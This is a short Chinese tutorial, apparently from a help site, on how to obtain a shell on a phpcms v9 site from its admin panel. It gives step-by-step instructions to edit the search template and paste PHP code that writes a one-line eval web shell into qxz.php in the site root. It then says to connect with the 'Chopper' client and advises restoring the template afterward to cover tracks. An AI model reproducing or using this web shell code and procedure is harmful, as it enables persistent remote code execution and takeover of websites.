phpcms怎么拿shell

登录注册

摘要：phpcms拿shell的方法：首先登录phpcms后台管理；然后依次点击“界面”->“模板风格”，并点击“详细列表”；接着点击“search”文件夹；最后修改“index.html”，并点击“可视化”即可

phpcms拿shell的方法：首先登录phpcms后台管理；然后依次点击“界面”->“模板风格”，并点击“详细列表”；接着点击“search”文件夹；最后修改“index.html”，并点击“可视化”即可。

记一次phpcms v9后台拿shell过程

登录进入后台管理后，点击界面，模板风格，然后点击祥细列表，如下图：

推荐：《phpcms教程》

然后点击 search 这个文件夹，如下图：

然后点击修改 index.html 文件

然后把以下代码复制上去提交。

<?
$fp = @fopen(“qxz.php”, ‘a’);
@fwrite($fp, ‘<‘.’?php’.”\\r\\n\\r\\n”.’eval($_POST[hacker])’.”\\r\\n\\r\\n?”.”>\\r\\n”);
@fclose($fp);
?>

提示：修改前先把原来的代码备份一下，拿到shell后把他改回去。

提交后点击可视化一下

这样在网站的根目录就生成了你的一句话木马客户端 qxz.php

拿起菜刀链接 http://www.xxx.com/qxz.php